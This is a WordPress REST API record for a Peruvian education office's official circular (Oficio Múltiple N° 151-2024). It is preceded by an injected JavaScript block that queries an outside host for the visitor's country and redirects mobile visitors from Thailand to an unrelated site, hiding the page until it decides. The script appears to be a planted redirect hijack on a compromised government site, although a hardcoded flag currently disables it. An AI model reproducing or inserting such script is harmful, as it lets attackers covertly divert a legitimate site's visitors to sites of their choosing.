<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":4160,"date":"2024-01-23T16:27:10","date_gmt":"2024-01-23T21:27:10","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=4160"},"modified":"2024-01-23T16:27:10","modified_gmt":"2024-01-23T21:27:10","slug":"oficio-multiple-n-151-2024-gra-gre-d-ugel-j-agi-r-apafa","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/oficio-multiple-n-151-2024-gra-gre-d-ugel-j-agi-r-apafa\/","title":{"rendered":"OFICIO M\u00daLTIPLE N\u00b0 151-2024- GRA\/GRE\/D.UGEL\/J.AGI-\/R.APAFA"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"1024\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/01\/WhatsApp-Image-2024-01-23-at-3.46.55-PM-710x1024.jpeg\" alt=\"\" class=\"wp-image-4162\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/01\/WhatsApp-Image-2024-01-23-at-3.46.55-PM-710x1024.jpeg 710w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/01\/WhatsApp-Image-2024-01-23-at-3.46.55-PM-208x300.jpeg 208w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/01\/WhatsApp-Image-2024-01-23-at-3.46.55-PM-768x1108.jpeg 768w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/01\/WhatsApp-Image-2024-01-23-at-3.46.55-PM.jpeg 854w\" sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,34],"tags":[],"class_list":["post-4160","post","type-post","status-publish","format-standard","hentry","category-comunicados","category-oficio-oficio-multiple"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/4160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=4160"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/4160\/revisions"}],"predecessor-version":[{"id":4163,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/4160\/revisions\/4163"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=4160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=4160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=4160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}